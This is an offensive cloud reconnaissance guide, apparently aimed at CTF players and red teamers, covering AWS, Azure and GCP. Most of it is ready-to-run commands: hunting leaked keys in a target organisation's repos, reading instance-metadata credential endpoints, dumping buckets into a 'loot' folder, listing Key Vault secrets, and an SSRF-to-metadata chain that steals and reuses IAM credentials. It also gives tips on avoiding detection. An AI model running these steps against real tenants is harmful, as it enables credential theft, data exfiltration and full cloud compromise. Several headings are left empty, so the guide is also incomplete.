Cloud Recon & Enum

Cloud Reconnaissance & Enumeration — Hunting in the Cloud

Cloud environments are the new perimeter — sprawling networks of APIs, storage buckets, virtual machines, IAM roles, and serverless functions. Understanding how to enumerate, map, and exploit cloud assets is critical for both CTF success and real-world pentesting.

This guide breaks down cloud reconnaissance into AWS, Azure, and GCP workflows, covering open-source intel, credential abuse, and service enumeration.

I. 🧩 Core Cloud Enumeration Concepts

II. ⚙️ Passive Cloud Recon (OSINT Phase)

Passive cloud reconnaissance is your stealth layer — no direct interaction with the target’s cloud.

🧠 1. Identify Cloud Providers

dig example.com

Look for patterns:

s3.amazonaws.com → AWS
blob.core.windows.net → Azure
storage.googleapis.com → GCP

⚙️ 2. Search Exposed Buckets

site:s3.amazonaws.com example
site:blob.core.windows.net example
site:storage.googleapis.com example

🧩 3. Code & Repo Enumeration

gh search "AWS_SECRET_ACCESS_KEY" user:targetorg

or use:

trufflehog github --org targetorg

⚙️ 4. Public Artifacts

• Terraform configs

• CloudFormation templates

• .env files

• config.json with keys

III. 🧠 Cloud Metadata Enumeration (Local Discovery)

If you get access to a cloud instance → enumerate internal metadata services.

⚙️ AWS EC2

curl http://169.254.169.254/latest/meta-data/

🧩 Azure VM

curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

⚙️ GCP

curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/

These endpoints can expose:

• IAM role names

• Access tokens

• Instance details

• Cloud API credentials

IV. ☁️ AWS Reconnaissance

🧠 1. Identify Public Buckets

aws s3 ls s3://target-bucket --no-sign-request

or with s3scanner:

s3scanner --bucket target-bucket

⚙️ 2. Enumerate S3 Buckets Automatically

aws s3 ls | awk '{print $3}'

💣 3. Dump Files from Public Bucket

aws s3 sync s3://target-bucket ./loot --no-sign-request

🧩 4. IAM Enumeration (Using Keys)

aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws iam list-policies

⚙️ 5. Enumerate EC2 & Networking

aws ec2 describe-instances --region us-east-1
aws ec2 describe-security-groups

💣 6. Sensitive Data Search

aws s3api list-objects --bucket target-bucket --output text | grep key

Look for:

keys/
secrets/
credentials.json
.env

🧠 7. Misconfigurations to Exploit

V. ⚙️ Azure Reconnaissance

🧩 1. Enumerate Public Blob Containers

https://<account>.blob.core.windows.net/<container>/

Try browsing or appending ?comp=list.

⚙️ 2. Azure Storage Scanner

python3 azure-scanner.py -d example.com

🧠 3. Azure CLI Enumeration

az account show
az ad user list
az ad sp list
az storage account list
az keyvault list

⚙️ 4. Azure Key Vault Access

az keyvault secret list --vault-name targetvault

VI. ☁️ GCP Reconnaissance

🧩 1. Identify Open Buckets

gsutil ls gs://target-bucket

⚙️ 2. Dump Files from Public Bucket

gsutil -m cp -r gs://target-bucket ./loot

🧠 3. GCP CLI Enumeration

gcloud projects list
gcloud iam service-accounts list
gcloud storage buckets list

⚙️ 4. Check Cloud Functions & APIs

gcloud functions list
gcloud services list --enabled

VII. 💣 Cloud API Key Identification

Search patterns in source, JS, or config files:

grep -rni "AKIA" .
grep -rni "AIza" .
grep -rni "EAACEdEose0cBA" .

VIII. 🧩 Cloud Infrastructure Mapping

⚙️ DNS & CDN Fingerprints

dig target.com

Look for:

cloudfront.net → AWS CloudFront
azureedge.net → Azure CDN
googleusercontent.com → GCP CDN

🧠 IP Analysis

whois <ip>

Reveals:

• AWS (Amazon Technologies Inc.)

• Microsoft Azure

• Google Cloud

IX. ⚙️ Hybrid Cloud Enumeration Pipeline

# 1. Passive discovery
subfinder -d target.com -silent | httpx -silent -o live.txt

# 2. Detect Cloud Services
cat live.txt | nuclei -t cloud/

# 3. Enumerate Buckets
s3scanner --bucket target
python3 azure-scanner.py -d target.com
gsutil ls gs://target-bucket

# 4. Validate Keys
trufflehog file ./code/
detect-secrets scan ./src/

X. ⚙️ SSRF to Cloud Metadata Exploitation

🧠 Example

If SSRF found on AWS:

curl -G "http://vulnerable.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Retrieve temporary credentials:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

Then use them:

aws configure
# Paste access + secret keys + session token
aws s3 ls

XI. ⚙️ Secrets in CI/CD & Infrastructure

Look for:

• .github/workflows/ with keys

• .gitlab-ci.yml with tokens

• Jenkins pipelines exporting environment vars

⚙️ Detect Automatically

trufflehog filesystem --directory ./repo/
detect-secrets scan ./src/

XII. ⚙️ Misconfiguration Exploitation Matrix

XIII. ⚔️ Pro Tips & Red Team Tricks

✅ Cross-Pivoting

• Use cloud storage findings to pivot into on-prem systems (via creds or configs).

✅ Automation

• Combine subfinder, httpx, and nuclei -t cloud to auto-detect public assets.

✅ Avoid Detection

• Use public resolvers and the --no-sign-request flag to avoid authentication logs.

✅ Loot Everything

• .env, .json, .pem, .p12, .yaml, .boto, .dockerconfigjson → gold.

✅ Cloud + Web

• Many RCEs → metadata endpoint → AWS creds → full cloud compromise.

XIV. ⚙️ Quick Reference Table